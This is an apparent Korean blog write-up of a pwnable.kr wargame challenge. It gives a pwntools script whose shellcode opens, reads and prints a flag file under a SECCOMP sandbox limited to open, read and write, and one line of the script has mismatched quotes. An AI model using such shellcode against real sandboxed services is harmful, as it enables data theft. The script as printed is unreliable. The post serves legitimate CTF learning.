본격 토들러 다풀고 롸업쓰기
얍 쉘코드 만드는 문제인감
SECCOMP 로 샌드박스 처리 되있고
고로 open read write 만 써서 flag 파일을 읽는건감,,
우리 갓갓친구 pwntool의 shellcodecraft를 사용해봅시당
계획은 open으로 겁나긴 파일 열고 read로 읽어서 스택에 저장하고 write 로 표준출력하는 걸로
from pwn import *
sh = ssh("asm","pwnable.kr",port=2222,password="guest")
p = sh.connect_remote("0", 9026)
context(arch="amd64", os="linux")
shellcode = shellcraft.pushstr("this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong")
shellcode += shellcraft.open("rsp", 0, 0)
shellcode += shellcraft.read("rax', "rsp", 100)
shellcode += shellcraft.write(1, "rsp", 100)
p.recvuntil("shellcode: ")
p.send(asm(shellcode))
print p.recvline()
끝,,,, 개사기네진짜
'Pwnable' 카테고리의 다른 글
Babypwn, r0pbaby, casino (0) | 2017.08.28 |
---|---|
[overthewire] leviathan (0) | 2017.08.18 |
[Toddler's Bottle] passcode (0) | 2017.07.04 |
[Toddler's Bottle] lotto (0) | 2017.07.04 |
[Toddler's Bottle] blackjack (0) | 2017.07.04 |